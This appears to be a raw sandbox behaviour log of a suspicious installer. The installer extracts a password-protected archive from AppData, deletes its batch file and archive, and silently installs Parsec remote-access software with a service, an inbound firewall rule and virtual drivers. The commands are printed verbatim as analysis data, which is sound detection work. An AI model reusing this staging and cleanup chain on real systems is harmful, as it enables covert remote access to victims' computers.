Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "parsecd.exe")
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: nefconc.exe String found in binary or memory: --add-class-filter
Source: nefconc.exe String found in binary or memory: Invoked --inf-default-install
Source: nefconc.exe String found in binary or memory: --inf-default-install
Source: nefconc.exe String found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconc.exe String found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconc.exe String found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconc.exe String found in binary or memory: --install-driver
Source: nefconw.exe String found in binary or memory: --inf-default-install Installs an INF file with a [DefaultInstall] section
Source: nefconw.exe String found in binary or memory: --add-class-filter Adds a service to a device class' filter collection
Source: nefconw.exe String found in binary or memory: --install-driver
Source: nefconw.exe String found in binary or memory: --inf-default-install
Source: nefconw.exe String found in binary or memory: Invoked --inf-default-install
Source: nefconw.exe String found in binary or memory: --install-driver Invoke the installation of a given PNP driver
Source: nefconw.exe String found in binary or memory: --add-class-filter
Source: uu8v4UUzTU.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe File read: C:\Users\user\Desktop\uu8v4UUzTU.exe
Source: unknown Process created: C:\Users\user\Desktop\uu8v4UUzTU.exe "C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Process created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\Parsec\pservice.exe "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wevtutil.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Process created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Program Files\Parsec\pservice.exe Process created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Parsec\pservice.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\wevtutil.exe Process created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Section loaded: textshaping.dll
